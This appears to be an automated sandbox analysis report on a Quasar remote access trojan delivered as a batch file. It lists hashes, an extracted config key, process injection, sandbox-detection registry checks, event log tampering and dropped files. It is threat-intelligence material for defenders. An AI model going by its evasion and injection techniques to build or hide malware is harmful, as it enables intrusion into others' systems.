Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
19-11-2024 21:24
Static task
static1
Behavioral task
behavioral1
Sample
hand.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
hand.bat
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
hand.bat
Resource
win11-20241007-en
General
-
Target
hand.bat
-
Size
7.0MB
-
MD5
1a013c7ac90b58073895b26cae70def7
-
SHA1
60c9c3294fc7ac3d336a478274f62f4818498230
-
SHA256
698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688
-
SHA512
c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75
-
SSDEEP
49152:vZrlGoT+Xts/LJjeDPnIwT0ZFBZP2x3fLKs0HMb0DprNMiKwPjp9Kw2EdF8d7nrx:Y
Malware Config
Extracted
quasar
-
encryption_key
1162A0E173FED8E7CF598896A547E279E681EE6F
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/3168-1670-0x0000016DEF200000-0x0000016DEF96C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2044 created 612 2044 powershell.exe 5 PID 3168 created 612 3168 powershell.exe 5 -
Blocklisted process makes network request 3 IoCs
flow pid Process 21 3168 powershell.exe 24 3168 powershell.exe 28 3168 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2044 powershell.exe 3168 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 1 IoCs
pid Process 1780 oauLVi.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\Recovery ReAgentc.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\$nya-mQEb5bu8 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2044 set thread context of 1364 2044 powershell.exe 91 PID 3168 set thread context of 3720 3168 powershell.exe 100 -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\$rbx-onimai2 powershell.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe File opened for modification C:\Windows\$nya-onimai2 powershell.exe File created C:\Windows\$nya-onimai2\oauLVi.exe powershell.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe -
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00188010E58640AD" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732051581" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00188010E58640AD" mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00188010E58640AD = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000f5700b71113c2b45abca0dda15e6fa420000000002000000000010660000000100002000000062bf683072b3d7bc57e7669606acf357e226d276e21cfb5589a069cf39efbd21000000000e80000000020000200000003d58097ebd8fc01f91e40d915d700b335e68ca6b9e3f5780c5370030eb39678780000000a7de9620a23c7a8d900c1ee35ddd2693d72d8bf3e2afeead7824343decd82fc2d883e4422489aa80df6c256aee646fb1ef30469c5c07ccc57435ad7a09e4e57453393c739e4c90daa9b8953d34cadeb0ea9b73ea5cbfc47d2174fd06828d3b5abdb298a794832a4dd74da5c2a2300efba638aa91b163995dee58b092f72746b340000000e149fd75f9dfa1dcf8d755fd2500dc91acbf1185b22d6e1921f8a873f205f54a53a5aec1b00ac59437fd4a9ae3dc736b9371365cf609b409c1f6d2dd3a12b7cd mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={8F4CBB41-74B8-4011-B44C-F76D702C5A96}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 19 Nov 2024 21:26:22 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000f5700b71113c2b45abca0dda15e6fa42000000000200000000001066000000010000200000007e2e52e75ae256bd8d7989d4a37fcbc1c0ff99817f579e4196d35b60e5c295f7000000000e8000000002000020000000288cd6e739d11dc0db3a4740859d53d106af4eb0f16b22e762820eecd52e4706b0030000ab0960cd1e92efdc136c43d7aaa88875281e289504c68f1f39c7e17d06eddbb546ac6bb4ac56025a7aa648b84b50fbbe5851d8e3bc92d0517b62f6ece824c4dbc3dc2091b6790881a6782cb0e810ba2c4631f8d6b10dddb2507dd3dc1e0b01712c213dca5498477ea639be43eaa5c96dacbb94057759cb0e98341b060829b5c4ca775e5c927f8f10f887d6554e84a46b6ecda8fb5d1b3cef1a1eb5211d117daea906f9baa81961f3b6737f30583fdbdb1b6549b0bb4c8f8e296aff5e6bb52ec163f64f4fb6d20bea9bbe8527265b41ac2ebe28cad01cc16a331d5ada1ee898ad6fee3a1457d15acb7a835d2dc57ffcf20174308280fdbda1119309bf67dfe4dd3af387afe03dde8c7e44614ab7212069db3cd344f845d0b25a7c951834c03900dd2ee8ede02ccc96fb99a30dee746c05b2a0a4a61e7e7306568083e00f41ca99ec8710b5c651bddf472b8e9f30c46e92903421c219eb8f62ae086f86e48ff035c47b77ce0941e44da58f60a6933a3fbccace5be1942e395ce0184b65e938d0936b1430a35e56081956e352aa03ef19a635b5747b960a1d81985f94f28ee5d3bb9c63b2cd0528a994c4dd967427f7c7161e3b9e16b4c79eb08ceb2558340e4ad0c049215fb7981d987382eda8a505b6f45fd257d61ad1c3b6cba57bbad344642939b8ed95f808e05e13682fd4375bee4694ed53ff99907aac79985ff5a8a138ab186ba12ce1b6c110bca1ff33d4f06ae7664efc271026c7b75a1f8742883fad45829976199ae9911b18642f0952c23bb1cfba113b08383232b0f873efda31aa04a09e21cff3742b9147822de39e3c2975801a21e01980feeb450076fca4efae71eb002e35f9d0a8e93a1b42c588efdcb879a6c0ca9934ef983d2ece8d05c017166bea92fbb4c73e122e0cb9df900c53f2abcda07b16d6dd17d5d5ea1d91fa4966fdd8d991a897003146f9651369b19b7b0d5897d74fae61c72c377ea8f77b701da7570638fdd691155612e7fc12a692db0c5b56a89876b2b7946fff77d3e702fa96043fe02b89809ee13d8174b42dbcc656aa63aba66fdde62989c2c4c179e6ac0e8cfc9a318430baf81ea7c3529441be42444cea08b70e1489f33257a19a12c98716a1789c6978d9b4da125f6ccf0d27aca43ae89ab477e5a4cd6e3e01e330a68200e381f966e95a0bcde666cf587b505dbc0c7f7f67a7c3e6ed315f7cf7e22ec5f20ebbe55b45e0b63bdddaca3f0797124029e459c6118b8a06d63d6bda492db1deaee280080708e836f4300c83a0640e1e352defea3c79e5559e11348bfbc3262b41d7cda7a90a3941f3891fa3bd4340000000ce24c3c39d4f90051df34ba77fdb2f1e7462b3d6d569d9ff0ce9281eac43dadda6ae972f977c6fc7c653bb18f26309292673305ef9eeac191b98dc45698254b7 mousocoreworker.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 3168 powershell.exe 3168 powershell.exe 1364 dllhost.exe 1364 dllhost.exe 3168 powershell.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 3168 powershell.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 3168 powershell.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 3168 powershell.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe 1364 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2044 powershell.exe Token: SeDebugPrivilege 1364 dllhost.exe Token: SeShutdownPrivilege 1076 dwm.exe Token: SeCreatePagefilePrivilege 1076 dwm.exe Token: SeShutdownPrivilege 3652 Explorer.EXE Token: SeCreatePagefilePrivilege 3652 Explorer.EXE Token: SeDebugPrivilege 3168 powershell.exe Token: SeShutdownPrivilege 2024 svchost.exe Token: SeCreatePagefilePrivilege 2024 svchost.exe Token: SeShutdownPrivilege 3652 Explorer.EXE Token: SeCreatePagefilePrivilege 3652 Explorer.EXE Token: SeShutdownPrivilege 3652 Explorer.EXE Token: SeCreatePagefilePrivilege 3652 Explorer.EXE Token: SeDebugPrivilege 3720 dllhost.exe Token: SeShutdownPrivilege 780 RuntimeBroker.exe Token: SeShutdownPrivilege 780 RuntimeBroker.exe Token: SeShutdownPrivilege 3652 Explorer.EXE Token: SeCreatePagefilePrivilege 3652 Explorer.EXE Token: SeShutdownPrivilege 3652 Explorer.EXE Token: SeCreatePagefilePrivilege 3652 Explorer.EXE Token: SeShutdownPrivilege 3652 Explorer.EXE Token: SeCreatePagefilePrivilege 3652 Explorer.EXE Token: SeShutdownPrivilege 780 RuntimeBroker.exe Token: SeShutdownPrivilege 3652 Explorer.EXE Token: SeCreatePagefilePrivilege 3652 Explorer.EXE Token: SeAuditPrivilege 2364 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1744 svchost.exe Token: SeIncreaseQuotaPrivilege 1744 svchost.exe Token: SeSecurityPrivilege 1744 svchost.exe Token: SeTakeOwnershipPrivilege 1744 svchost.exe Token: SeLoadDriverPrivilege 1744 svchost.exe Token: SeSystemtimePrivilege 1744 svchost.exe Token: SeBackupPrivilege 1744 svchost.exe Token: SeRestorePrivilege 1744 svchost.exe Token: SeShutdownPrivilege 1744 svchost.exe Token: SeSystemEnvironmentPrivilege 1744 svchost.exe Token: SeUndockPrivilege 1744 svchost.exe Token: SeManageVolumePrivilege 1744 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1744 svchost.exe Token: SeIncreaseQuotaPrivilege 1744 svchost.exe Token: SeSecurityPrivilege 1744 svchost.exe Token: SeTakeOwnershipPrivilege 1744 svchost.exe Token: SeLoadDriverPrivilege 1744 svchost.exe Token: SeSystemtimePrivilege 1744 svchost.exe Token: SeBackupPrivilege 1744 svchost.exe Token: SeRestorePrivilege 1744 svchost.exe Token: SeShutdownPrivilege 1744 svchost.exe Token: SeSystemEnvironmentPrivilege 1744 svchost.exe Token: SeUndockPrivilege 1744 svchost.exe Token: SeManageVolumePrivilege 1744 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1744 svchost.exe Token: SeIncreaseQuotaPrivilege 1744 svchost.exe Token: SeSecurityPrivilege 1744 svchost.exe Token: SeTakeOwnershipPrivilege 1744 svchost.exe Token: SeLoadDriverPrivilege 1744 svchost.exe Token: SeSystemtimePrivilege 1744 svchost.exe Token: SeBackupPrivilege 1744 svchost.exe Token: SeRestorePrivilege 1744 svchost.exe Token: SeShutdownPrivilege 1744 svchost.exe Token: SeSystemEnvironmentPrivilege 1744 svchost.exe Token: SeUndockPrivilege 1744 svchost.exe Token: SeManageVolumePrivilege 1744 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1744 svchost.exe Token: SeIncreaseQuotaPrivilege 1744 svchost.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3652 Explorer.EXE 3652 Explorer.EXE 3652 Explorer.EXE 3652 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3168 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4788 wrote to memory of 1968 4788 cmd.exe 84 PID 4788 wrote to memory of 1968 4788 cmd.exe 84 PID 4788 wrote to memory of 2044 4788 cmd.exe 85 PID 4788 wrote to memory of 2044 4788 cmd.exe 85 PID 2044 wrote to memory of 1364 2044 powershell.exe 91 PID 2044 wrote to memory of 1364 2044 powershell.exe 91 PID 2044 wrote to memory of 1364 2044 powershell.exe 91 PID 2044 wrote to memory of 1364 2044 powershell.exe 91 PID 2044 wrote to memory of 1364 2044 powershell.exe 91 PID 2044 wrote to memory of 1364 2044 powershell.exe 91 PID 2044 wrote to memory of 1364 2044 powershell.exe 91 PID 2044 wrote to memory of 1364 2044 powershell.exe 91 PID 1364 wrote to memory of 612 1364 dllhost.exe 5 PID 1364 wrote to memory of 680 1364 dllhost.exe 7 PID 1364 wrote to memory of 976 1364 dllhost.exe 12 PID 1364 wrote to memory of 476 1364 dllhost.exe 13 PID 1364 wrote to memory of 764 1364 dllhost.exe 14 PID 1364 wrote to memory of 716 1364 dllhost.exe 15 PID 1364 wrote to memory of 632 1364 dllhost.exe 16 PID 1364 wrote to memory of 1076 1364 dllhost.exe 17 PID 1364 wrote to memory of 1108 1364 dllhost.exe 18 PID 1364 wrote to memory of 1116 1364 dllhost.exe 19 PID 1364 wrote to memory of 1200 1364 dllhost.exe 20 PID 1364 wrote to memory of 1272 1364 dllhost.exe 21 PID 1364 wrote to memory of 1356 1364 dllhost.exe 23 PID 1364 wrote to memory of 1444 1364 dllhost.exe 24 PID 1364 wrote to memory of 1460 1364 dllhost.exe 25 PID 1364 wrote to memory of 1480 1364 dllhost.exe 26 PID 1364 wrote to memory of 1536 1364 dllhost.exe 27 PID 1364 wrote to memory of 1676 1364 dllhost.exe 28 PID 1364 wrote to memory of 1688 1364 dllhost.exe 29 PID 2044 wrote to memory of 3208 2044 powershell.exe 92 PID 2044 wrote to memory of 3208 2044 powershell.exe 92 PID 680 wrote to memory of 2824 680 lsass.exe 47 PID 680 wrote to memory of 2824 680 lsass.exe 47 PID 1364 wrote to memory of 1704 1364 dllhost.exe 30 PID 1364 wrote to memory of 1844 1364 dllhost.exe 31 PID 1364 wrote to memory of 2000 1364 dllhost.exe 32 PID 1364 wrote to memory of 2012 1364 dllhost.exe 33 PID 1364 wrote to memory of 1744 1364 dllhost.exe 34 PID 1364 wrote to memory of 1064 1364 dllhost.exe 35 PID 1364 wrote to memory of 1932 1364 dllhost.exe 36 PID 1364 wrote to memory of 2056 1364 dllhost.exe 37 PID 1364 wrote to memory of 2144 1364 dllhost.exe 38 PID 1364 wrote to memory of 2220 1364 dllhost.exe 39 PID 1364 wrote to memory of 2364 1364 dllhost.exe 41 PID 1364 wrote to memory of 2524 1364 dllhost.exe 42 PID 1364 wrote to memory of 2604 1364 dllhost.exe 43 PID 1364 wrote to memory of 2612 1364 dllhost.exe 44 PID 1364 wrote to memory of 2764 1364 dllhost.exe 45 PID 1364 wrote to memory of 2800 1364 dllhost.exe 46 PID 1364 wrote to memory of 2824 1364 dllhost.exe 47 PID 1364 wrote to memory of 2860 1364 dllhost.exe 48 PID 1364 wrote to memory of 2868 1364 dllhost.exe 49 PID 1364 wrote to memory of 2108 1364 dllhost.exe 50 PID 1364 wrote to memory of 2136 1364 dllhost.exe 51 PID 1364 wrote to memory of 3076 1364 dllhost.exe 52 PID 1364 wrote to memory of 3248 1364 dllhost.exe 54 PID 1364 wrote to memory of 3280 1364 dllhost.exe 55 PID 1364 wrote to memory of 3564 1364 dllhost.exe 56 PID 1364 wrote to memory of 3652 1364 dllhost.exe 57 PID 1364 wrote to memory of 3768 1364 dllhost.exe 58 PID 1364 wrote to memory of 780 1364 dllhost.exe 60 PID 1364 wrote to memory of 4120 1364 dllhost.exe 62 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d5b9cfd4-9e48-4179-a51b-288ac74b712a}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1364
-
-
